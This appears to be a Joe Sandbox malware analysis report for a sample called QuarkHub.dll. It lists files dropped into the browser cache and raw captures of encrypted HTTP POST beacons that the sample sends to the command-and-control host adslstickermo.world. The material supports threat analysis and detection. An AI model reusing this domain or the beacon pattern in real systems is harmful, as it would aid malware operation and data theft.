Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1CCA3UEJ.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\2799CHIZ.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\65MS1DSP.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\6DAD1LFV.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9ABJYFMF.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\A91OJAE0.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\B78M7RY6.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\C24VKYN2.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FOCOC6ZA.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FOFEFPGJ.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\HBFG7X8P.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\HG6E873N.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\IWREHDUX.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\LKCH3EMR.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\MXB4UAOJ.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OJCO9BVR.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PBY4GT7C.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\QZH6QM3D.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RQWOEFA3.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SAK026GW.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SY2B747S.htm

Windows Analysis Report
QuarkHub.dll

Timestamp	Bytes transferred	Direction	Data
2024-01-03 17:26:33 UTC	151	OUT	POST / HTTP/1.1 Accept: / User-Agent: User metrics Host: adslstickermo.world Content-Length: 4561 Connection: Close Cache-Control: no-cache
2024-01-03 17:26:33 UTC	4561	OUT	Data Raw: f4 e1 a2 11 9a ce 78 98 f4 43 22 53 c2 7c 41 f6 4f f8 30 52 b6 94 c8 a8 f4 30 ab 1e e1 93 e8 8d 68 73 1f b9 4b 61 f3 5e 24 e8 55 47 76 ff 32 f1 48 b1 a6 5d ab 3b e2 f8 0a e5 a8 1a 74 87 d0 9a 7d 8a 77 66 6a 2f c3 8a f0 a9 1d d9 73 64 1d 53 ba a4 69 6e b9 0a 38 a9 e2 af 7f 5d 8b 2a 57 54 a5 42 73 97 96 2f e3 e5 be ca 77 16 94 b7 bb 69 2f eb 1b eb be 4b 0d 4f 49 3f a9 ed 64 62 10 1c c6 18 43 c8 ea 87 38 eb b8 c7 fd 0c 98 69 b9 08 5a e3 df b8 d5 3a f0 c1 84 c2 af 18 ed 8d 9d 73 0c 45 ea 49 82 d0 09 55 0b b0 85 ac 73 3d 0a 7c c9 03 99 4c b4 20 da ce 65 c7 a2 23 6c 31 4e 7f 3b 04 9e 9b e7 28 39 fd 07 94 e6 87 07 a9 83 8a c4 d9 7c 6c b2 c8 e4 69 d1 20 02 9f 6b 97 c2 f1 00 9b a6 c7 01 89 0e 67 19 26 27 58 79 91 2f bd 2e 20 2a 74 99 c1 33 37 83 0c 69 19 40 bd 7f Data Ascii: xC"S\|AO0R0hsKa^$UGv2H];t}wfj/sdSin8]WTBs/wi/KOI?dbC8iZ:sEIUs=\|L e#l1N;(9\|li kg&'Xy/. t37i@
2024-01-03 17:26:33 UTC	574	IN	HTTP/1.1 200 OK Date: Wed, 03 Jan 2024 17:26:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ObRpxgqqCb62YlthTjQmM4hxlKiYTcywidLZlb5u0jpdQq6sUwBL4Nw60RMBm2OPeP7zCpWvdBVi3MawCcS%2F0InUH9era5o7bQYdM4tDuQ9SlCbVNB%2FdFJvBwa0lUa3kSt9dNm0q"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83fcf28a9e0c3166-DFW alt-svc: h3=":443"; ma=86400
2024-01-03 17:26:33 UTC	795	IN	Data Raw: 31 38 38 35 0d 0a f0 7b ce af 90 f2 f3 9b 5c 2f 8e 81 59 0c 5e a3 8b 6f f1 5d e4 02 c8 f9 bc fa 97 20 d8 b8 a8 46 4a fd 11 2f bc 1f 5a ab d3 c5 dd f9 56 87 f3 57 fa 3c a6 73 8b 1f e5 f1 5e fc 99 18 53 0e 71 40 f9 e1 7b 7f 24 cc dd 19 e7 74 06 67 e7 49 63 6a 20 3d 98 88 48 19 35 b8 28 fe dc 41 7d 81 d4 e7 da 41 7c 1d 8e 44 94 d3 c9 8e ea ae 8f 37 ef 14 e4 8b b0 dc 1b 26 ac cd 46 e9 e1 e2 0f 29 8a c6 0d 7e cf 69 ec b6 16 40 08 4c cd 06 23 d3 2e 51 17 83 e1 d5 f6 31 c3 09 b2 79 c3 77 24 f4 e2 1a 7b bd 73 f5 ff 54 2b 35 93 ad a5 8a a4 d0 15 14 96 79 c9 74 3a 0f 77 db e6 26 0a bd ee 40 c5 ee 23 ce ea d1 33 57 42 32 a8 0f 9e 31 bb fc f4 27 34 ab b2 26 e5 44 3e 62 47 02 96 2b ca 4f 72 c8 25 8e f7 3f 27 8e cf ab 51 4a 6b 62 64 42 28 3c dc 65 73 72 8b d4 2f 24 ad Data Ascii: 1885{\/Y^o] FJ/ZVW<s^Sq@{$tgIcj =H5(A}A\|D7&F)~i@L#.Q1yw${sT+5yt:w&@#3WB21'4&D>bG+Or%?'QJkbdB(<esr/$
2024-01-03 17:26:33 UTC	1369	IN	Data Raw: 73 b5 4f 57 b8 a3 8f c6 02 14 fc 70 f3 a3 6c 7d 7a cc 02 47 0a 69 14 46 60 41 ce c6 9d 28 03 32 fe a1 b9 70 76 84 f4 c0 9f f1 89 80 bd ea a1 4f 85 1a dc 47 44 47 07 bd 53 54 de 17 50 bf 3d ea 30 27 26 b5 d8 3e 09 ab d1 29 a2 4c 53 76 d3 8c ad 27 87 11 07 b3 4e b1 49 bd 4f 91 49 eb de 24 5b 77 58 eb 18 53 b8 a9 ad f7 d3 36 79 80 d3 de 21 15 38 1b 67 9a c9 1e 17 84 bf 5e 2d 01 b3 c5 09 31 2c b9 06 46 61 00 d0 f4 64 e2 2b 6c c5 6f 25 f7 3f 34 7d 99 5c f0 4e 72 6a bb 01 4a 82 cb 09 2d 1f 4c 22 29 46 c3 79 5d 16 e2 9f 0b f0 9d 64 03 d1 89 15 6f d6 e7 ad 07 65 26 a6 88 86 5a ef eb 47 45 bf 6f 4b 49 12 65 ad 2a 8c f4 54 a1 97 91 f0 bd a5 2f ab c8 b8 09 eb 6b c9 cb 60 25 10 d6 c3 72 bf 30 ca 16 2e fb 85 c2 cc fb da 0a 08 bf d0 2b 55 b1 d5 cb 47 1e 51 ab cf 3f 19 Data Ascii: sOWpl}zGiF`A(2pvOGDGSTP=0'&>)LSv'NIOI$[wXS6y!8g^-1,Fad+lo%?4}\NrjJ-L")Fy]doe&ZGEoKIe*T/k`%r0.+UGQ?
2024-01-03 17:26:33 UTC	1369	IN	Data Raw: 1e 1b 68 33 48 c9 e2 8c 3f 44 8f e3 9c d2 0e 69 7a 67 a2 e8 20 19 72 3c d0 51 7e 46 53 1f 69 c6 76 15 76 98 0c 95 46 c6 3c 6f ca dc 12 a2 95 d1 69 a8 85 0f 30 f0 46 8b 7e 2d 2c 0e 97 3b 2c 9c 0d ad 00 4a 23 cc b4 b0 dc 62 67 c9 72 e3 b2 6e 73 6f 6e 1b 25 f0 dd 6e 75 d1 a1 2b 03 76 33 ee 12 0c 58 c0 21 37 44 a1 7b 46 f5 00 ea 40 2f b6 8f 50 0d cb 32 ae 1c 6c f4 6d 48 9c 98 ff ab b7 9c 67 cd 89 93 1f 3b 22 f6 39 95 78 00 b0 81 26 f0 21 ea 6a f2 ac e6 98 98 7e 11 af dc f0 b4 81 0b f8 ff 0d ab 6f b1 d3 8d 7f 10 07 28 ed 75 b0 01 66 14 fb 80 89 32 b8 f3 09 82 6f 19 57 cf 51 69 46 9e 37 f0 63 f7 f3 d3 be 2e 83 19 66 c7 d8 a8 54 45 eb ee 94 ef a0 54 0b dc 23 48 5e 52 ba 41 7e c9 17 db 41 b5 11 40 8c 56 cc 6a 29 6c dd 0e 3b 30 4b 9f a8 e5 6d f7 a5 54 13 7a 16 fa Data Ascii: h3H?Dizg r<Q~FSivvF<oi0F~-,;,J#bgrnson%nu+v3X!7D{F@/P2lmHg;"9x&!j~o(uf2oWQiF7c.fTET#H^RA~A@Vj)l;0KmTz
2024-01-03 17:26:33 UTC	1369	IN	Data Raw: f4 fb 0b 5d 93 91 48 db e9 8d 6b f1 84 f7 75 7f 0a 33 38 9b ee e4 95 41 da 92 81 c6 00 03 a5 43 8d 4a 5d e1 ba 80 3f 6e d5 58 3d f7 9d 4e 89 f4 2c 80 40 e4 5a 41 ad 22 3e 02 90 ab 50 97 1e 7e fd e6 dd c0 2e 31 9d aa dd 70 ac 04 de 3f ed 26 78 2c e0 59 52 c4 64 d9 9c 85 7e b1 d5 d5 64 75 76 3f 01 a1 96 64 8c 31 d5 a7 1e 74 e7 0a a7 5f 88 40 e3 c5 6d 62 60 d0 9d bc 8d 66 bd 4f 9d 90 05 cd ae d3 df c8 c6 f8 42 0b c7 96 ff e7 b7 c5 8e 38 68 38 d2 ab 11 48 15 0c 23 d3 bf 3e b9 d9 9f a8 0d a5 4c 15 32 98 61 4a a5 2e 46 aa 04 06 d4 72 e3 ce 85 d9 ae ca b7 ed 9c 95 1e ba d8 f8 50 21 14 f8 e0 61 a7 19 08 4d 3e 6a 6f 79 34 a6 f1 b1 6a e7 9d 87 f7 9f 2c 7a 29 44 79 37 f7 e7 44 1d 17 10 7c b6 c5 ce 96 41 fa 5a 6b 31 3d 17 5c bd 60 e3 ec 37 b0 52 62 3a 32 90 3e a9 ea Data Ascii: ]Hku38ACJ]?nX=N,@ZA">P~.1p?&x,YRd~duv?d1t_@mb`fOB8h8H#>L2aJ.FrP!aM>joy4j,z)Dy7D\|AZk1=\`7Rb:2>
2024-01-03 17:26:33 UTC	1369	IN	Data Raw: 47 ea b5 cd 5d aa 02 7f 1d 6e e6 ed 17 53 18 81 ce 2d c5 4f 10 18 72 89 1f 93 e3 0f 3f 0b 97 d0 56 48 37 b4 7d e5 52 cf 48 11 f9 16 97 09 18 b1 4b 91 21 2c a0 d4 e0 64 b2 6c b1 4b 6d 7c 46 9b b0 68 7f a3 0b 57 ed fb 50 fe 91 e8 94 c5 a4 bf 33 d4 48 01 ea d2 28 30 45 44 4f 14 c0 60 f1 b5 06 c4 38 3d c4 02 88 30 1a cb ad 13 54 aa 3d 1b f6 75 f7 9a f5 a7 41 6e ee b3 ca 95 6f d2 10 7c ea 3e 66 bb 4b f1 fe 48 72 e4 d2 07 93 49 e6 db 2f 51 a5 f6 95 62 d7 b7 b8 59 85 89 f4 50 4b 39 3b 5b 35 a5 9f 2f 54 90 5f 00 85 9b 12 08 85 a2 ee 67 af 09 49 e5 c0 f9 e4 78 3e 62 e0 d7 24 30 e1 35 26 0e 0d 08 57 94 bf bd 76 67 02 35 1f 7c 9e f1 0b 81 54 cf 2b 7c ad 97 66 29 6b 1f ff 78 d0 f4 e5 b5 8a 84 8e c5 67 a1 3f 1e cb 7e 35 3d 2a 9f 10 e7 d6 64 a6 7a 5c 4e d8 06 4e f8 28 Data Ascii: G]nS-Or?VH7}RHK!,dlKm\|FhWP3H(0EDO`8=0T=uAno\|>fKHrI/QbYPK9;[5/T_gIx>b$05&Wvg5\|T+\|f)kxg?~5=*dz\NN(
2024-01-03 17:26:33 UTC	14	IN	Data Raw: 4c e5 a9 6c 65 2a da a1 cc 2b 2d d0 0d 0a Data Ascii: Lle*+-
2024-01-03 17:26:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-01-03 17:26:35 UTC	151	OUT	POST / HTTP/1.1 Accept: / User-Agent: User metrics Host: adslstickermo.world Content-Length: 4561 Connection: Close Cache-Control: no-cache
2024-01-03 17:26:35 UTC	4561	OUT	Data Raw: 4e f7 54 ed f2 5e 5d 6c e4 7c 20 b5 9c 6e 00 32 d9 4c 2f 38 4a e6 38 c7 fb 4a 66 7b f2 5c 48 80 85 71 de 61 08 06 f9 6c 3c 5e db 79 11 a1 10 33 01 64 c9 df c3 3c 98 59 ec 85 42 20 17 3c e4 b5 a1 2d 97 79 b5 b2 75 db 3f 6e 5a 66 b3 ce 71 e8 56 3b da 7d d5 00 6e 94 f8 42 43 25 ea dd 56 56 dd cc 5a 0f 95 e5 b1 28 75 04 66 38 55 97 b0 00 0a a1 f6 cc 63 17 2d a8 7d a0 5e 66 81 f5 b3 4b 3c 9a 8b d2 6a 90 be 29 97 f0 63 5d f4 69 61 c1 1e e1 1b 0a 23 98 17 e3 92 60 ee d4 f6 a6 0b e6 e2 09 dc b6 34 4d 55 18 4c b1 88 0d 85 2b 08 31 60 24 ee d7 bf 8e 68 e2 05 10 9f 2f af 86 fa 4b 58 6f a5 74 08 3a 71 f0 c5 f4 f2 9b f5 81 0b ed 4a 30 8e cf 5e 0a 69 2b cf 96 80 20 17 d2 b9 4e c6 b4 17 8a 86 bb 10 9e b4 bc 72 df 7a e2 8b e1 8f 08 62 0f a9 76 00 14 38 8a d2 f3 e6 82 11 Data Ascii: NT^]l\| n2L/8J8Jf{\Hqal<^y3d<YB <-yu?nZfqV;}nBC%VVZ(uf8Uc-}^fK<j)c]ia#`4MUL+1`$h/KXot:qJ0^i+ Nrzbv8
2024-01-03 17:26:35 UTC	584	IN	HTTP/1.1 200 OK Date: Wed, 03 Jan 2024 17:26:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BS4ukAjSgadJ1dtegPKm2%2FCU7TOmnokomyvkT0%2FLEbzBZ95ZcJ952M5mSzD0k4fa9jnXi9zsO%2FO%2FfOq%2FGkgp0jFh17xYmTOfaqD305yA7RIbF9fuDkftRTrj2mW25F53%2FIxA8brr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83fcf297590be59d-DFW alt-svc: h3=":443"; ma=86400
2024-01-03 17:26:35 UTC	785	IN	Data Raw: 31 38 38 35 0d 0a a6 bf 7f e6 04 dc 00 06 4d 50 33 9e a9 ce 8d f9 06 03 67 40 bd 0f 80 74 05 f7 79 43 6c 3c 91 7c 0b 1e 88 7f a5 2d a9 49 3b 6b 7f f7 0f 3e 5e b5 fc b4 7e 47 2f 1e f8 72 91 84 0b bb 3f 16 6a db 35 25 ef 3f 64 71 3a bb 8a bb bd d4 ba ce 44 a2 01 7b c5 84 0b 74 17 55 99 e7 f1 51 ae 6b 00 f7 b3 c1 62 ff a6 d9 25 85 cb bb 10 86 23 eb e4 e7 ea 0c 57 08 84 3e 30 41 52 c0 f5 a7 06 b9 4b 79 c1 f1 1b 7a 72 32 e6 df d4 c1 7e 7b 07 cd de cf ef df 24 56 b0 9a 5a 3f 0f 2d a6 f1 8f 29 b9 d7 b1 9a 91 d8 89 bb ec e9 a5 5d b1 c8 68 92 a7 49 67 f6 06 2d 5f 4c 1e 1f 9c a6 63 53 de fd 17 62 e3 be 60 fa c7 d3 f7 53 9a bb 46 1e cd 38 41 d7 3e 18 99 23 73 38 74 68 c9 d6 ce ab c7 1b 7c d0 2d c7 e4 db 9e 05 10 2a 69 74 71 5f 05 93 df 4f 76 ce f8 d7 ec 28 1a 70 f8 Data Ascii: 1885MP3g@tyCl<\|-I;k>^~G/r?j5%?dq:D{tUQkb%#W>0ARKyzr2~{$VZ?-)]hIg-_LcSb`SF8A>#s8th\|-*itq_Ov(p
2024-01-03 17:26:35 UTC	1369	IN	Data Raw: ad e0 00 fc e7 20 b6 09 25 4d b9 61 de a6 a5 6d 3a 16 e2 9f 45 d5 c1 96 bb f4 53 91 19 45 3c 9d d9 2a a3 c1 e5 2c 50 49 0f f1 84 53 63 34 86 7d 6a fd ac ac ce dc 10 e8 30 34 3e 8b 95 f5 ae 1e 58 9b d8 20 81 08 71 45 a1 5b a1 25 76 99 75 be ed 78 9a c6 f7 b8 ca d4 ed eb f7 25 c2 0a 1f 14 b9 fe 0f 8a c8 c8 e3 18 ab ae 2f 58 c1 a7 54 7a 15 92 08 8f d4 60 0e d5 0a c6 b8 9a 51 4a b5 9c 9a c0 be 28 f5 7a 08 3b 1b 4a 7e 11 0e 7d bd 98 d8 c7 2d 84 50 08 d1 0b c5 50 5c b2 08 41 7d 7c 1e d6 40 5c d0 1d 2f 4c 58 1f 2f d8 1b 5d 2a 51 07 1b 4a 2f f4 eb f6 e5 5a e6 2f b2 b1 dd ed db 64 13 f6 7b 40 1c 70 2f 71 67 40 45 eb f9 02 af 8e 7c 39 91 01 9a a3 00 42 cd 4f e8 96 8d e3 4b a0 6d 08 2c 72 68 3c f6 f6 f9 37 87 9f 12 8e 42 4e 49 bc 39 b0 56 b2 44 3e 2a d5 3e b1 0b 37 Data Ascii: %Mam:ESE<,PISc4}j04>X qE[%vux%/XTz`QJ(z;J~}-PP\A}\|@\/LX/]QJ/Z/d{@p/qg@E\|9BOKm,rh<7BNI9VD>*>7
2024-01-03 17:26:35 UTC	1369	IN	Data Raw: 9f 72 97 f4 6f a5 c2 cc 39 48 54 f7 d5 20 f5 8f 46 46 13 3a c1 f6 c9 3b 03 ff 17 d5 36 bb 54 78 3f 2a 83 fb a2 99 68 31 38 6d 07 7b 10 6a da 73 7c 72 6b 0e e9 b9 28 a9 6b c2 d6 d3 7f 7d e0 e7 08 1b 0a d9 b6 a1 2d bb 82 05 fb 25 35 bc c6 d5 14 89 a7 3a cd 24 ba 8a 8a 81 4a 02 5c ee 8d 46 75 94 37 07 9f d1 6d 51 8a 79 9b 3c d3 4e 92 b8 7c 70 05 43 d2 13 2a 55 39 85 73 1b c0 1a 15 e1 4b c4 2b 5d 2b 6c bb 56 4b 13 fb 97 b3 23 d7 18 71 ab e7 49 6d 5a 26 b6 b8 5a 8e ee 9c 2e bb a2 15 06 a0 85 8f 36 47 d6 05 37 5a af 86 5d 83 27 53 e2 dd 4b 1c 43 21 b2 44 04 c8 b4 bd 1d de 98 9b ea be 89 fa 30 51 2d 00 af 8f c6 b9 77 cb 38 97 d7 e0 e2 52 52 a7 4b ee e4 74 67 79 b9 5c f6 ad 5f 9a 63 7c 75 68 11 55 cf 63 d7 e2 51 66 28 c7 1b ee 40 cd a9 7b bf ac ce 50 45 6a b2 bb Data Ascii: ro9HT FF:;6Tx?h18m{js\|rk(k}-%5:$J\Fu7mQy<N\|pCU9sK+]+lVK#qImZ&Z.6G7Z]'SKC!D0Q-w8RRKtgy\_c\|uhUcQf(@{PEj
2024-01-03 17:26:35 UTC	1369	IN	Data Raw: 38 82 f2 1d 8a 2b a8 5b bf b7 2b e4 33 03 0e 64 6e fc 3c b2 af 4b 71 e0 77 d0 3c 8d 18 a3 ad 5a 0e d9 41 03 ae 93 05 13 d7 48 94 ee cb d2 42 71 21 12 f6 fd da 98 2d 40 15 73 32 07 09 0e 59 69 e5 eb 9b 3e 2c 2d ae 55 d5 d3 bd de 27 43 ab a9 fc 41 79 8d f3 01 8d 9b 27 aa 4c 32 f4 d4 98 2e 52 c2 52 91 91 36 8a f9 06 f6 d8 a9 28 13 f9 de a2 b0 c1 bd 50 4e 9d de 5a bc 2b ee 7a 3d ba 86 8f 10 e0 dd 88 57 c4 bf 38 0f 6f c6 1b 3f 45 f9 b6 50 74 b3 f2 ce ac 46 9e ea 78 da c5 f6 c9 83 ab 10 23 f7 f9 fa 86 c9 60 14 41 e9 84 37 84 a9 0d 7e 70 7a 17 d4 a8 b4 6c 48 c9 6b 8b 65 90 4d eb 92 39 12 29 28 36 90 6c da d2 4f 45 bf b8 c3 8d 9c a3 88 dd 20 ff cd 7a f4 2c 57 9b 13 03 85 d9 fa a0 8c 3c b2 b2 9e 17 7e 3b 5e 2b 67 9e 88 e0 cf 21 e4 b4 d0 68 4a fd 15 26 20 5e d7 45 Data Ascii: 8+[+3dn<Kqw<ZAHBq!-@s2Yi>,-U'CAy'L2.RR6(PNZ+z=W8o?EPtFx#`A7~pzlHkeM9)(6lOE z,W<~;^+g!hJ& ^E
2024-01-03 17:26:35 UTC	1369	IN	Data Raw: 42 3b c6 76 b5 84 16 22 48 34 e1 68 72 96 b2 cc 99 ea 72 ab 8b f2 78 70 fa 91 6f cd 22 9a a9 53 d6 6c 26 95 c8 47 5d d0 d4 40 da 69 cf 2b d1 10 ad 32 f1 98 21 cb df 09 6e 1e 3c 52 cc dd f6 6d a4 12 15 69 5a b1 4f 56 cf e8 73 ed eb e1 c1 87 33 e1 65 4d ec d1 65 6b e7 8e d5 06 9a 62 94 7b e6 0a 45 31 1d 7d cd 7d 1d 93 d2 53 d7 5b ee 82 7c 46 61 1e 34 25 72 08 86 59 d5 c0 d0 4c cd 56 f6 77 af 27 23 d4 95 6f 5f 16 b3 e6 1d 0d 5d 3b 4f 84 35 c3 91 b3 5b 8f c2 2a 72 01 6d 66 cb 90 9a 3b 1f 66 c5 4d 3f dc d3 89 43 db 92 a7 cc 11 8a f4 58 aa 5f 92 3a 81 d4 67 21 76 ed 92 d6 9b f3 71 26 61 07 8a fb 19 6b 06 07 09 a7 10 56 8f 5f c8 4b 93 00 c9 ad a8 2d 88 2a b0 7c c7 a0 9b 28 ae b0 49 14 44 aa 6c d7 68 2a 70 c9 7b fc 18 a7 62 1b 04 09 19 fe f6 91 34 be db 99 72 aa Data Ascii: B;v"H4hrrxpo"Sl&G]@i+2!n<RmiZOVs3eMekb{E1}}S[\|Fa4%rYLVw'#o_];O5[rmf;fM?CX_:g!vq&akV_K-\|(IDlh*p{b4r
2024-01-03 17:26:35 UTC	24	IN	Data Raw: 23 a6 43 08 bf 03 26 e5 f7 65 a4 48 92 ab cc dc 4c 1b fc c5 c9 5e 0d 0a Data Ascii: #C&eHL^
2024-01-03 17:26:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-01-03 17:26:38 UTC	151	OUT	POST / HTTP/1.1 Accept: / User-Agent: User metrics Host: adslstickermo.world Content-Length: 4561 Connection: Close Cache-Control: no-cache
2024-01-03 17:26:38 UTC	4561	OUT	Data Raw: 25 40 9b 5c b4 a3 25 31 8c 16 6d fa e4 6f 29 8c aa ff 20 eb ef eb 51 4f 8c 35 e7 6f 9b 0a 04 6e 6d 74 51 56 71 df 95 7b c8 56 94 ad 54 9d e6 58 09 0a fb 97 4b 9c 31 fe 5b 68 aa 1d af e8 97 4b da fa 96 52 2f 24 0d ca ec c8 17 04 e8 86 bd 15 2c 6a 5e c7 8d db e4 75 37 44 7f 7a a7 0d 30 49 1c 21 39 88 9b 24 11 82 0a 2f c9 76 c0 26 0e 55 45 b7 a2 d6 ff c9 17 80 a9 d2 e4 6b d4 a2 30 0b 07 b0 a3 aa 00 ea 47 83 fb e6 9c 09 83 b6 6d 3c 36 23 5c 20 64 1f 02 96 39 f9 a9 a6 97 ac b4 25 73 f2 33 a8 7a 16 4c a0 3a 1b 6c ae c7 d6 13 fe 64 5e 12 f3 6e a2 4a 99 48 ea b0 f3 cb d5 9f ba 7e b8 93 21 47 e4 5c fa 51 0c 5e 91 2f a1 72 01 5e 66 26 23 76 d5 5e a4 29 bc d7 7d 7d 69 a7 28 a1 4e 31 78 86 9a a3 ec c3 4b 9b b2 5d 36 dd 3a 43 d4 51 09 d2 88 db ab c2 d6 16 21 f3 f5 71 Data Ascii: %@\%1mo) QO5onmtQVq{VTXK1[hKR/$,j^u7Dz0I!9$/v&UEk0Gm<6#\ d9%s3zL:ld^nJH~!G\Q^/r^f&#v^)}}i(N1xK]6:CQ!q
2024-01-03 17:26:38 UTC	574	IN	HTTP/1.1 200 OK Date: Wed, 03 Jan 2024 17:26:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XPWlPUUwDwTAWRbOTftKgo3T73pq5PHius%2BgTUa7NZdo8JqrOebBrYpeWFQfNsTbmXC6SwsBWoEh5C9HrTi5ISw3vCfDdhJ69olfBTy2CwnJuIx%2Fx7bdZrACcpJQ84r6rkG3myih"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83fcf2a9f8a86b50-DFW alt-svc: h3=":443"; ma=86400
2024-01-03 17:26:38 UTC	795	IN	Data Raw: 31 38 38 35 0d 0a 26 6a 6e 9f d1 86 92 46 25 4b 2a 5f a7 d7 11 e9 8d d4 5a b3 23 51 4c d8 77 b7 e7 e8 d4 ef f7 66 43 3c be b8 32 af 69 28 94 18 42 8d 94 1a 9c a3 21 17 5b ba 27 eb 03 d0 05 a7 fd be 82 9c d6 f3 ca 2b 00 b3 f2 76 ce 68 c7 9a c8 07 b9 37 e4 97 cc f4 b4 b1 fa 72 f9 03 a6 14 7f d5 1d 09 c7 48 0d e2 9d d4 7f 21 4f 2e 65 95 20 32 dd e6 6b e5 ff 09 bd d7 26 19 32 27 71 45 e8 ac ca 17 f2 1e 92 b8 af f9 4e b6 00 f6 00 a5 54 39 49 5f 8c a4 6f d7 f3 c5 42 16 6f 62 b5 82 27 3c 0e ee 62 4f f3 4e be c1 6a aa f6 19 42 97 fa 32 31 5a 28 ff f9 16 70 33 d8 16 fd d8 06 58 73 45 b6 54 de d3 78 6b dc 7e 4e 56 8a fd 4d 1a 1a e2 c7 95 f8 03 54 aa c7 e9 a1 43 89 7d 5a d1 d4 05 ea 51 c9 ee c9 5c f1 2b 16 8b 83 94 6e f1 2d 32 bd 4b 53 18 a9 49 74 f5 15 85 b7 13 f2 Data Ascii: 1885&jnF%K*_Z#QLwfC<2i(B!['+vh7rH!O.e 2k&2'qENT9I_oBob'<bONjB21Z(p3XsETxk~NVMTC}ZQ\+n-2KSIt
2024-01-03 17:26:38 UTC	1369	IN	Data Raw: 33 69 f3 7a 0b c9 4a ac f3 4f 20 23 db 9d a0 39 27 14 b0 59 f8 a3 a3 2c d6 0f 42 d6 9d c7 bb b1 17 d1 e5 4b 77 c7 4f 03 7d f8 85 0f a0 0e a5 cd 31 ac 66 61 bd 07 f4 b0 37 f7 01 a6 e9 b7 d0 68 81 d1 7a bb 97 22 54 32 66 6e 76 06 0b 4e 51 ae 83 d6 59 41 bf a6 a3 90 73 c5 c3 77 19 c8 31 38 ed ac 84 c1 08 ad a3 31 f4 70 e0 fe cb 8d 27 23 89 7d b6 98 e6 8d 16 c9 4d 2f b2 03 c9 06 1f 0d 27 71 d5 a2 76 4c d5 ba 31 cc a8 33 0f 8f 73 ca cc 3a 18 b9 42 88 94 14 2d c0 21 a7 b2 03 cf 1f 55 1b b2 fd c7 0f 9e b3 b3 bd 9d a0 49 ca db 14 17 2d 38 91 a1 0a 81 f5 e3 78 9d cc 41 44 b2 0b 74 f3 cf 75 f9 13 6b 3d 01 64 a0 9f b9 62 67 98 91 4a 46 84 9b a0 51 37 c7 60 01 f8 01 1b eb b6 38 d5 de 18 40 f1 94 0b f5 b5 4f 8a 20 49 78 bd c8 9e a4 0b 1d 03 b8 03 1b 22 9e 47 0f 52 76 Data Ascii: 3izJO #9'Y,BKwO}1fa7hz"T2fnvNQYAsw181p'#}M/'qvL13s:B-!UI-8xADtuk=dbgJFQ7`8@O Ix"GRv
